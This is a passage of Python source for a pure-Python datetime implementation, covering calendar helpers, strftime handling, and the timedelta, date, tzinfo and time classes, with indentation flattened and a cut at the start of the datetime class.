return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def _days_before_year(year):
"year -> number of days before January 1st of year."
y = year - 1
return y*365 + y//4 - y//100 + y//400
def _days_in_month(year, month):
"year, month -> number of days in that month in that year."
assert 1 <= month <= 12, month
if month == 2 and _is_leap(year):
return 29
return _DAYS_IN_MONTH[month]
def _days_before_month(year, month):
"year, month -> number of days in year preceding first day of month."
assert 1 <= month <= 12, 'month must be in 1..12'
return _DAYS_BEFORE_MONTH[month] + (month > 2 and _is_leap(year))
def _ymd2ord(year, month, day):
"year, month, day -> ordinal, considering 01-Jan-0001 as day 1."
assert 1 <= month <= 12, 'month must be in 1..12'
dim = _days_in_month(year, month)
assert 1 <= day <= dim, ('day must be in 1..%d' % dim)
return (_days_before_year(year) +
_days_before_month(year, month) +
day)
_DI400Y = _days_before_year(401) # number of days in 400 years
_DI100Y = _days_before_year(101) # " " " " 100 "
_DI4Y = _days_before_year(5) # " " " " 4 "
# A 4-year cycle has an extra leap day over what we'd get from pasting
# together 4 single years.
assert _DI4Y == 4 * 365 + 1
# Similarly, a 400-year cycle has an extra leap day over what we'd get from
# pasting together 4 100-year cycles.
assert _DI400Y == 4 * _DI100Y + 1
# OTOH, a 100-year cycle has one fewer leap day than we'd get from
# pasting together 25 4-year cycles.
assert _DI100Y == 25 * _DI4Y - 1
def _ord2ymd(n):
"ordinal -> (year, month, day), considering 01-Jan-0001 as day 1."
# n is a 1-based index, starting at 1-Jan-1. The pattern of leap years
# repeats exactly every 400 years. The basic strategy is to find the
# closest 400-year boundary at or before n, then work with the offset
# from that boundary to n. Life is much clearer if we subtract 1 from
# n first -- then the values of n at 400-year boundaries are exactly
# those divisible by _DI400Y:
#
# D M Y n n-1
# -- --- ---- ---------- ----------------
# 31 Dec -400 -_DI400Y -_DI400Y -1
# 1 Jan -399 -_DI400Y +1 -_DI400Y 400-year boundary
# ...
# 30 Dec 000 -1 -2
# 31 Dec 000 0 -1
# 1 Jan 001 1 0 400-year boundary
# 2 Jan 001 2 1
# 3 Jan 001 3 2
# ...
# 31 Dec 400 _DI400Y _DI400Y -1
# 1 Jan 401 _DI400Y +1 _DI400Y 400-year boundary
n -= 1
n400, n = divmod(n, _DI400Y)
year = n400 * 400 + 1 # ..., -399, 1, 401, ...
# Now n is the (non-negative) offset, in days, from January 1 of year, to
# the desired date. Now compute how many 100-year cycles precede n.
# Note that it's possible for n100 to equal 4! In that case 4 full
# 100-year cycles precede the desired day, which implies the desired
# day is December 31 at the end of a 400-year cycle.
n100, n = divmod(n, _DI100Y)
# Now compute how many 4-year cycles precede it.
n4, n = divmod(n, _DI4Y)
# And now how many single years. Again n1 can be 4, and again meaning
# that the desired day is December 31 at the end of the 4-year cycle.
n1, n = divmod(n, 365)
year += n100 * 100 + n4 * 4 + n1
if n1 == 4 or n100 == 4:
assert n == 0
return year-1, 12, 31
# Now the year is correct, and n is the offset from January 1. We find
# the month via an estimate that's either exact or one too large.
leapyear = n1 == 3 and (n4 != 24 or n100 == 3)
assert leapyear == _is_leap(year)
month = (n + 50) >> 5
preceding = _DAYS_BEFORE_MONTH[month] + (month > 2 and leapyear)
if preceding > n: # estimate is too large
month -= 1
preceding -= _DAYS_IN_MONTH[month] + (month == 2 and leapyear)
n -= preceding
assert 0 <= n < _days_in_month(year, month)
# Now the year and month are correct, and n is the offset from the
# start of that month: we're done!
return year, month, n+1
# Month and day names. For localized versions, see the calendar module.
_MONTHNAMES = [None, "Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
_DAYNAMES = [None, "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
def _build_struct_time(y, m, d, hh, mm, ss, dstflag):
wday = (_ymd2ord(y, m, d) + 6) % 7
dnum = _days_before_month(y, m) + d
return _time.struct_time((y, m, d, hh, mm, ss, wday, dnum, dstflag))
def _format_time(hh, mm, ss, us):
# Skip trailing microseconds when us==0.
result = "%02d:%02d:%02d" % (hh, mm, ss)
if us:
result += ".%06d" % us
return result
# Correctly substitute for %z and %Z escapes in strftime formats.
def _wrap_strftime(object, format, timetuple):
# Don't call utcoffset() or tzname() unless actually needed.
freplace = None # the string to use for %f
zreplace = None # the string to use for %z
Zreplace = None # the string to use for %Z
# Scan format for %z and %Z escapes, replacing as needed.
newformat = []
push = newformat.append
i, n = 0, len(format)
while i < n:
ch = format[i]
i += 1
if ch == '%':
if i < n:
ch = format[i]
i += 1
if ch == 'f':
if freplace is None:
freplace = '%06d' % getattr(object,
'microsecond', 0)
newformat.append(freplace)
elif ch == 'z':
if zreplace is None:
zreplace = ""
if hasattr(object, "utcoffset"):
offset = object.utcoffset()
if offset is not None:
sign = '+'
if offset.days < 0:
offset = -offset
sign = '-'
h, m = divmod(offset, timedelta(hours=1))
assert not m % timedelta(minutes=1), "whole minute"
m //= timedelta(minutes=1)
zreplace = '%c%02d%02d' % (sign, h, m)
assert '%' not in zreplace
newformat.append(zreplace)
elif ch == 'Z':
if Zreplace is None:
Zreplace = ""
if hasattr(object, "tzname"):
s = object.tzname()
if s is not None:
# strftime is going to have at this: escape %
Zreplace = s.replace('%', '%%')
newformat.append(Zreplace)
else:
push('%')
push(ch)
else:
push('%')
else:
push(ch)
newformat = "".join(newformat)
return _time.strftime(newformat, timetuple)
# Just raise TypeError if the arg isn't None or a string.
def _check_tzname(name):
if name is not None and not isinstance(name, str):
raise TypeError("tzinfo.tzname() must return None or string, "
"not '%s'" % type(name))
# name is the offset-producing method, "utcoffset" or "dst".
# offset is what it returned.
# If offset isn't None or timedelta, raises TypeError.
# If offset is None, returns None.
# Else offset is checked for being in range, and a whole # of minutes.
# If it is, its integer value is returned. Else ValueError is raised.
def _check_utc_offset(name, offset):
assert name in ("utcoffset", "dst")
if offset is None:
return
if not isinstance(offset, timedelta):
raise TypeError("tzinfo.%s() must return None "
"or timedelta, not '%s'" % (name, type(offset)))
if offset % timedelta(minutes=1) or offset.microseconds:
raise ValueError("tzinfo.%s() must return a whole number "
"of minutes, got %s" % (name, offset))
if not -timedelta(1) < offset < timedelta(1):
raise ValueError("%s()=%s, must be must be strictly between "
"-timedelta(hours=24) and timedelta(hours=24)" %
(name, offset))
def _check_int_field(value):
if isinstance(value, int):
return value
if not isinstance(value, float):
try:
value = value.__int__()
except AttributeError:
pass
else:
if isinstance(value, int):
return value
raise TypeError('__int__ returned non-int (type %s)' %
type(value).__name__)
raise TypeError('an integer is required (got type %s)' %
type(value).__name__)
raise TypeError('integer argument expected, got float')
def _check_date_fields(year, month, day):
year = _check_int_field(year)
month = _check_int_field(month)
day = _check_int_field(day)
if not MINYEAR <= year <= MAXYEAR:
raise ValueError('year must be in %d..%d' % (MINYEAR, MAXYEAR), year)
if not 1 <= month <= 12:
raise ValueError('month must be in 1..12', month)
dim = _days_in_month(year, month)
if not 1 <= day <= dim:
raise ValueError('day must be in 1..%d' % dim, day)
return year, month, day
def _check_time_fields(hour, minute, second, microsecond):
hour = _check_int_field(hour)
minute = _check_int_field(minute)
second = _check_int_field(second)
microsecond = _check_int_field(microsecond)
if not 0 <= hour <= 23:
raise ValueError('hour must be in 0..23', hour)
if not 0 <= minute <= 59:
raise ValueError('minute must be in 0..59', minute)
if not 0 <= second <= 59:
raise ValueError('second must be in 0..59', second)
if not 0 <= microsecond <= 999999:
raise ValueError('microsecond must be in 0..999999', microsecond)
return hour, minute, second, microsecond
def _check_tzinfo_arg(tz):
if tz is not None and not isinstance(tz, tzinfo):
raise TypeError("tzinfo argument must be None or of a tzinfo subclass")
def _cmperror(x, y):
raise TypeError("can't compare '%s' to '%s'" % (
type(x).__name__, type(y).__name__))
def _divide_and_round(a, b):
"""divide a by b and round result to the nearest integer
When the ratio is exactly half-way between two integers,
the even integer is returned.
"""
# Based on the reference implementation for divmod_near
# in Objects/longobject.c.
q, r = divmod(a, b)
# round up if either r / b > 0.5, or r / b == 0.5 and q is odd.
# The expression r / b > 0.5 is equivalent to 2 * r > b if b is
# positive, 2 * r < b if b negative.
r *= 2
greater_than_half = r > b if b > 0 else r < b
if greater_than_half or r == b and q % 2 == 1:
q += 1
return q
class timedelta:
"""Represent the difference between two datetime objects.
Supported operators:
- add, subtract timedelta
- unary plus, minus, abs
- compare to timedelta
- multiply, divide by int
In addition, datetime supports subtraction of two datetime objects
returning a timedelta, and addition or subtraction of a datetime
and a timedelta giving a datetime.
Representation: (days, seconds, microseconds). Why? Because I
felt like it.
"""
__slots__ = '_days', '_seconds', '_microseconds', '_hashcode'
def __new__(cls, days=0, seconds=0, microseconds=0,
milliseconds=0, minutes=0, hours=0, weeks=0):
# Doing this efficiently and accurately in C is going to be difficult
# and error-prone, due to ubiquitous overflow possibilities, and that
# C double doesn't have enough bits of precision to represent
# microseconds over 10K years faithfully. The code here tries to make
# explicit where go-fast assumptions can be relied on, in order to
# guide the C implementation; it's way more convoluted than speed-
# ignoring auto-overflow-to-long idiomatic Python could be.
# XXX Check that all inputs are ints or floats.
# Final values, all integer.
# s and us fit in 32-bit signed ints; d isn't bounded.
d = s = us = 0
# Normalize everything to days, seconds, microseconds.
days += weeks*7
seconds += minutes*60 + hours*3600
microseconds += milliseconds*1000
# Get rid of all fractions, and normalize s and us.
# Take a deep breath <wink>.
if isinstance(days, float):
dayfrac, days = _math.modf(days)
daysecondsfrac, daysecondswhole = _math.modf(dayfrac * (24.*3600.))
assert daysecondswhole == int(daysecondswhole) # can't overflow
s = int(daysecondswhole)
assert days == int(days)
d = int(days)
else:
daysecondsfrac = 0.0
d = days
assert isinstance(daysecondsfrac, float)
assert abs(daysecondsfrac) <= 1.0
assert isinstance(d, int)
assert abs(s) <= 24 * 3600
# days isn't referenced again before redefinition
if isinstance(seconds, float):
secondsfrac, seconds = _math.modf(seconds)
assert seconds == int(seconds)
seconds = int(seconds)
secondsfrac += daysecondsfrac
assert abs(secondsfrac) <= 2.0
else:
secondsfrac = daysecondsfrac
# daysecondsfrac isn't referenced again
assert isinstance(secondsfrac, float)
assert abs(secondsfrac) <= 2.0
assert isinstance(seconds, int)
days, seconds = divmod(seconds, 24*3600)
d += days
s += int(seconds) # can't overflow
assert isinstance(s, int)
assert abs(s) <= 2 * 24 * 3600
# seconds isn't referenced again before redefinition
usdouble = secondsfrac * 1e6
assert abs(usdouble) < 2.1e6 # exact value not critical
# secondsfrac isn't referenced again
if isinstance(microseconds, float):
microseconds = round(microseconds + usdouble)
seconds, microseconds = divmod(microseconds, 1000000)
days, seconds = divmod(seconds, 24*3600)
d += days
s += seconds
else:
microseconds = int(microseconds)
seconds, microseconds = divmod(microseconds, 1000000)
days, seconds = divmod(seconds, 24*3600)
d += days
s += seconds
microseconds = round(microseconds + usdouble)
assert isinstance(s, int)
assert isinstance(microseconds, int)
assert abs(s) <= 3 * 24 * 3600
assert abs(microseconds) < 3.1e6
# Just a little bit of carrying possible for microseconds and seconds.
seconds, us = divmod(microseconds, 1000000)
s += seconds
days, s = divmod(s, 24*3600)
d += days
assert isinstance(d, int)
assert isinstance(s, int) and 0 <= s < 24*3600
assert isinstance(us, int) and 0 <= us < 1000000
if abs(d) > 999999999:
raise OverflowError("timedelta # of days is too large: %d" % d)
self = object.__new__(cls)
self._days = d
self._seconds = s
self._microseconds = us
self._hashcode = -1
return self
def __repr__(self):
if self._microseconds:
return "%s.%s(%d, %d, %d)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._days,
self._seconds,
self._microseconds)
if self._seconds:
return "%s.%s(%d, %d)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._days,
self._seconds)
return "%s.%s(%d)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._days)
def __str__(self):
mm, ss = divmod(self._seconds, 60)
hh, mm = divmod(mm, 60)
s = "%d:%02d:%02d" % (hh, mm, ss)
if self._days:
def plural(n):
return n, abs(n) != 1 and "s" or ""
s = ("%d day%s, " % plural(self._days)) + s
if self._microseconds:
s = s + ".%06d" % self._microseconds
return s
def total_seconds(self):
"""Total seconds in the duration."""
return ((self.days * 86400 + self.seconds) * 10**6 +
self.microseconds) / 10**6
# Read-only field accessors
@property
def days(self):
"""days"""
return self._days
@property
def seconds(self):
"""seconds"""
return self._seconds
@property
def microseconds(self):
"""microseconds"""
return self._microseconds
def __add__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days + other._days,
self._seconds + other._seconds,
self._microseconds + other._microseconds)
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days - other._days,
self._seconds - other._seconds,
self._microseconds - other._microseconds)
return NotImplemented
def __rsub__(self, other):
if isinstance(other, timedelta):
return -self + other
return NotImplemented
def __neg__(self):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(-self._days,
-self._seconds,
-self._microseconds)
def __pos__(self):
return self
def __abs__(self):
if self._days < 0:
return -self
else:
return self
def __mul__(self, other):
if isinstance(other, int):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days * other,
self._seconds * other,
self._microseconds * other)
if isinstance(other, float):
usec = self._to_microseconds()
a, b = other.as_integer_ratio()
return timedelta(0, 0, _divide_and_round(usec * a, b))
return NotImplemented
__rmul__ = __mul__
def _to_microseconds(self):
return ((self._days * (24*3600) + self._seconds) * 1000000 +
self._microseconds)
def __floordiv__(self, other):
if not isinstance(other, (int, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec // other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, usec // other)
def __truediv__(self, other):
if not isinstance(other, (int, float, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec / other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, _divide_and_round(usec, other))
if isinstance(other, float):
a, b = other.as_integer_ratio()
return timedelta(0, 0, _divide_and_round(b * usec, a))
def __mod__(self, other):
if isinstance(other, timedelta):
r = self._to_microseconds() % other._to_microseconds()
return timedelta(0, 0, r)
return NotImplemented
def __divmod__(self, other):
if isinstance(other, timedelta):
q, r = divmod(self._to_microseconds(),
other._to_microseconds())
return q, timedelta(0, 0, r)
return NotImplemented
# Comparisons of timedelta objects with other.
def __eq__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) == 0
else:
return False
def __le__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, timedelta)
return _cmp(self._getstate(), other._getstate())
def __hash__(self):
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
def __bool__(self):
return (self._days != 0 or
self._seconds != 0 or
self._microseconds != 0)
# Pickle support.
def _getstate(self):
return (self._days, self._seconds, self._microseconds)
def __reduce__(self):
return (self.__class__, self._getstate())
timedelta.min = timedelta(-999999999)
timedelta.max = timedelta(days=999999999, hours=23, minutes=59, seconds=59,
microseconds=999999)
timedelta.resolution = timedelta(microseconds=1)
class date:
"""Concrete date type.
Constructors:
__new__()
fromtimestamp()
today()
fromordinal()
Operators:
__repr__, __str__
__eq__, __le__, __lt__, __ge__, __gt__, __hash__
__add__, __radd__, __sub__ (add/radd only with timedelta arg)
Methods:
timetuple()
toordinal()
weekday()
isoweekday(), isocalendar(), isoformat()
ctime()
strftime()
Properties (readonly):
year, month, day
"""
__slots__ = '_year', '_month', '_day', '_hashcode'
def __new__(cls, year, month=None, day=None):
"""Constructor.
Arguments:
year, month, day (required, base 1)
"""
if month is None and isinstance(year, bytes) and len(year) == 4 and \
1 <= year[2] <= 12:
# Pickle support
self = object.__new__(cls)
self.__setstate(year)
self._hashcode = -1
return self
year, month, day = _check_date_fields(year, month, day)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hashcode = -1
return self
# Additional constructors
@classmethod
def fromtimestamp(cls, t):
"Construct a date from a POSIX timestamp (like time.time())."
y, m, d, hh, mm, ss, weekday, jday, dst = _time.localtime(t)
return cls(y, m, d)
@classmethod
def today(cls):
"Construct a date from time.time()."
t = _time.time()
return cls.fromtimestamp(t)
@classmethod
def fromordinal(cls, n):
"""Construct a date from a proleptic Gregorian ordinal.
January 1 of year 1 is day 1. Only the year, month and day are
non-zero in the result.
"""
y, m, d = _ord2ymd(n)
return cls(y, m, d)
# Conversions to string
def __repr__(self):
"""Convert to formal string, for repr().
>>> dt = datetime(2010, 1, 1)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0)'
>>> dt = datetime(2010, 1, 1, tzinfo=timezone.utc)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0, tzinfo=datetime.timezone.utc)'
"""
return "%s.%s(%d, %d, %d)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._year,
self._month,
self._day)
# XXX These shouldn't depend on time.localtime(), because that
# clips the usable dates to [1970 .. 2038). At least ctime() is
# easily done without using strftime() -- that's better too because
# strftime("%c", ...) is locale specific.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d 00:00:00 %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day, self._year)
def strftime(self, fmt):
"Format using strftime()."
return _wrap_strftime(self, fmt, self.timetuple())
def __format__(self, fmt):
if not isinstance(fmt, str):
raise TypeError("must be str, not %s" % type(fmt).__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
def isoformat(self):
"""Return the date formatted according to ISO.
This is 'YYYY-MM-DD'.
References:
- http://www.w3.org/TR/NOTE-datetime
- http://www.cl.cam.ac.uk/~mgk25/iso-time.html
"""
return "%04d-%02d-%02d" % (self._year, self._month, self._day)
__str__ = isoformat
# Read-only field accessors
@property
def year(self):
"""year (1-9999)"""
return self._year
@property
def month(self):
"""month (1-12)"""
return self._month
@property
def day(self):
"""day (1-31)"""
return self._day
# Standard conversions, __eq__, __le__, __lt__, __ge__, __gt__,
# __hash__ (and helpers)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
return _build_struct_time(self._year, self._month, self._day,
0, 0, 0, -1)
def toordinal(self):
"""Return proleptic Gregorian ordinal for the year, month and day.
January 1 of year 1 is day 1. Only the year, month and day values
contribute to the result.
"""
return _ymd2ord(self._year, self._month, self._day)
def replace(self, year=None, month=None, day=None):
"""Return a new date with new values for the specified fields."""
if year is None:
year = self._year
if month is None:
month = self._month
if day is None:
day = self._day
return date(year, month, day)
# Comparisons of date objects with other.
def __eq__(self, other):
if isinstance(other, date):
return self._cmp(other) == 0
return NotImplemented
def __le__(self, other):
if isinstance(other, date):
return self._cmp(other) <= 0
return NotImplemented
def __lt__(self, other):
if isinstance(other, date):
return self._cmp(other) < 0
return NotImplemented
def __ge__(self, other):
if isinstance(other, date):
return self._cmp(other) >= 0
return NotImplemented
def __gt__(self, other):
if isinstance(other, date):
return self._cmp(other) > 0
return NotImplemented
def _cmp(self, other):
assert isinstance(other, date)
y, m, d = self._year, self._month, self._day
y2, m2, d2 = other._year, other._month, other._day
return _cmp((y, m, d), (y2, m2, d2))
def __hash__(self):
"Hash."
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
# Computations
def __add__(self, other):
"Add a date to a timedelta."
if isinstance(other, timedelta):
o = self.toordinal() + other.days
if 0 < o <= _MAXORDINAL:
return date.fromordinal(o)
raise OverflowError("result out of range")
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
"""Subtract two dates, or a date and a timedelta."""
if isinstance(other, timedelta):
return self + timedelta(-other.days)
if isinstance(other, date):
days1 = self.toordinal()
days2 = other.toordinal()
return timedelta(days1 - days2)
return NotImplemented
def weekday(self):
"Return day of the week, where Monday == 0 ... Sunday == 6."
return (self.toordinal() + 6) % 7
# Day-of-the-week and week-of-the-year, according to ISO
def isoweekday(self):
"Return day of the week, where Monday == 1 ... Sunday == 7."
# 1-Jan-0001 is a Monday
return self.toordinal() % 7 or 7
def isocalendar(self):
"""Return a 3-tuple containing ISO year, week number, and weekday.
The first ISO week of the year is the (Mon-Sun) week
containing the year's first Thursday; everything else derives
from that.
The first week is 1; Monday is 1 ... Sunday is 7.
ISO calendar algorithm taken from
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
(used with permission)
"""
year = self._year
week1monday = _isoweek1monday(year)
today = _ymd2ord(self._year, self._month, self._day)
# Internally, week and day have origin 0
week, day = divmod(today - week1monday, 7)
if week < 0:
year -= 1
week1monday = _isoweek1monday(year)
week, day = divmod(today - week1monday, 7)
elif week >= 52:
if today >= _isoweek1monday(year+1):
year += 1
week = 0
return year, week+1, day+1
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
return bytes([yhi, ylo, self._month, self._day]),
def __setstate(self, string):
yhi, ylo, self._month, self._day = string
self._year = yhi * 256 + ylo
def __reduce__(self):
return (self.__class__, self._getstate())
_date_class = date # so functions w/ args named "date" can get at the class
date.min = date(1, 1, 1)
date.max = date(9999, 12, 31)
date.resolution = timedelta(days=1)
class tzinfo:
"""Abstract base class for time zone info classes.
Subclasses must override the name(), utcoffset() and dst() methods.
"""
__slots__ = ()
def tzname(self, dt):
"datetime -> string name of time zone."
raise NotImplementedError("tzinfo subclass must override tzname()")
def utcoffset(self, dt):
"datetime -> minutes east of UTC (negative for west of UTC)"
raise NotImplementedError("tzinfo subclass must override utcoffset()")
def dst(self, dt):
"""datetime -> DST offset in minutes east of UTC.
Return 0 if DST not in effect. utcoffset() must include the DST
offset.
"""
raise NotImplementedError("tzinfo subclass must override dst()")
def fromutc(self, dt):
"datetime in UTC -> datetime in local time."
if not isinstance(dt, datetime):
raise TypeError("fromutc() requires a datetime argument")
if dt.tzinfo is not self:
raise ValueError("dt.tzinfo is not self")
dtoff = dt.utcoffset()
if dtoff is None:
raise ValueError("fromutc() requires a non-None utcoffset() "
"result")
# See the long comment block at the end of this file for an
# explanation of this algorithm.
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc() requires a non-None dst() result")
delta = dtoff - dtdst
if delta:
dt += delta
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc(): dt.dst gave inconsistent "
"results; cannot convert")
return dt + dtdst
# Pickle support.
def __reduce__(self):
getinitargs = getattr(self, "__getinitargs__", None)
if getinitargs:
args = getinitargs()
else:
args = ()
getstate = getattr(self, "__getstate__", None)
if getstate:
state = getstate()
else:
state = getattr(self, "__dict__", None) or None
if state is None:
return (self.__class__, args)
else:
return (self.__class__, args, state)
_tzinfo_class = tzinfo
class time:
"""Time with time zone.
Constructors:
__new__()
Operators:
__repr__, __str__
__eq__, __le__, __lt__, __ge__, __gt__, __hash__
Methods:
strftime()
isoformat()
utcoffset()
tzname()
dst()
Properties (readonly):
hour, minute, second, microsecond, tzinfo
"""
__slots__ = '_hour', '_minute', '_second', '_microsecond', '_tzinfo', '_hashcode'
def __new__(cls, hour=0, minute=0, second=0, microsecond=0, tzinfo=None):
"""Constructor.
Arguments:
hour, minute (required)
second, microsecond (default to zero)
tzinfo (default to None)
"""
if isinstance(hour, bytes) and len(hour) == 6 and hour[0] < 24:
# Pickle support
self = object.__new__(cls)
self.__setstate(hour, minute or None)
self._hashcode = -1
return self
hour, minute, second, microsecond = _check_time_fields(
hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
self = object.__new__(cls)
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
self._hashcode = -1
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
# Standard conversions, __hash__ (and helpers)
# Comparisons of time objects with other.
def __eq__(self, other):
if isinstance(other, time):
return self._cmp(other, allow_mixed=True) == 0
else:
return False
def __le__(self, other):
if isinstance(other, time):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, time):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, time):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, time):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other, allow_mixed=False):
assert isinstance(other, time)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self.utcoffset()
otoff = other.utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._hour, self._minute, self._second,
self._microsecond),
(other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
if allow_mixed:
return 2 # arbitrary non-zero value
else:
raise TypeError("cannot compare naive and aware times")
myhhmm = self._hour * 60 + self._minute - myoff//timedelta(minutes=1)
othhmm = other._hour * 60 + other._minute - otoff//timedelta(minutes=1)
return _cmp((myhhmm, self._second, self._microsecond),
(othhmm, other._second, other._microsecond))
def __hash__(self):
"""Hash."""
if self._hashcode == -1:
tzoff = self.utcoffset()
if not tzoff: # zero or None
self._hashcode = hash(self._getstate()[0])
else:
h, m = divmod(timedelta(hours=self.hour, minutes=self.minute) - tzoff,
timedelta(hours=1))
assert not m % timedelta(minutes=1), "whole minute"
m //= timedelta(minutes=1)
if 0 <= h < 24:
self._hashcode = hash(time(h, m, self.second, self.microsecond))
else:
self._hashcode = hash((h, m, self.second, self.microsecond))
return self._hashcode
# Conversion to string
def _tzstr(self, sep=":"):
"""Return formatted timezone offset (+xx:xx) or None."""
off = self.utcoffset()
if off is not None:
if off.days < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, timedelta(hours=1))
assert not mm % timedelta(minutes=1), "whole minute"
mm //= timedelta(minutes=1)
assert 0 <= hh < 24
off = "%s%02d%s%02d" % (sign, hh, sep, mm)
return off
def __repr__(self):
"""Convert to formal string, for repr()."""
if self._microsecond != 0:
s = ", %d, %d" % (self._second, self._microsecond)
elif self._second != 0:
s = ", %d" % self._second
else:
s = ""
s= "%s.%s(%d, %d%s)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._hour, self._minute, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def isoformat(self):
"""Return the time formatted according to ISO.
This is 'HH:MM:SS.mmmmmm+zz:zz', or 'HH:MM:SS+zz:zz' if
self.microsecond == 0.
"""
s = _format_time(self._hour, self._minute, self._second,
self._microsecond)
tz = self._tzstr()
if tz:
s += tz
return s
__str__ = isoformat
def strftime(self, fmt):
"""Format using strftime(). The date part of the timestamp passed
to underlying strftime should not be used.
"""
# The year must be >= 1000 else Python's strftime implementation
# can raise a bogus exception.
timetuple = (1900, 1, 1,
self._hour, self._minute, self._second,
0, 1, -1)
return _wrap_strftime(self, fmt, timetuple)
def __format__(self, fmt):
if not isinstance(fmt, str):
raise TypeError("must be str, not %s" % type(fmt).__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
# Timezone functions
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
_check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(None)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
_check_utc_offset("dst", offset)
return offset
def replace(self, hour=None, minute=None, second=None, microsecond=None,
tzinfo=True):
"""Return a new time with new values for the specified fields."""
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
return time(hour, minute, second, microsecond, tzinfo)
# Pickle support.
def _getstate(self):
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = bytes([self._hour, self._minute, self._second,
us1, us2, us3])
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
raise TypeError("bad tzinfo state arg")
self._hour, self._minute, self._second, us1, us2, us3 = string
self._microsecond = (((us1 << 8) | us2) << 8) | us3
self._tzinfo = tzinfo
def __reduce__(self):
return (time, self._getstate())
_time_class = time # so functions w/ args named "time" can get at the class
time.min = time(0, 0, 0)
time.max = time(23, 59, 59, 999999)
time.resolution = timedelta(microseconds=1)
class datetime(date):
"""datetime(year, month, day[, hour[, minute[, second[, microsecond[,tzinfo]]]]])
The year, month and day arguments are required. tzinfo may be None, or an
instance of a tzinfo subclass. The remaining arguments may be ints.
"""
__slots__ = date.__slots__ + time.__slots__
def __new__(cls, year, month=None, day=None, hour=0, minute=0, second=0,
microsecond=0, tzinfo=None):
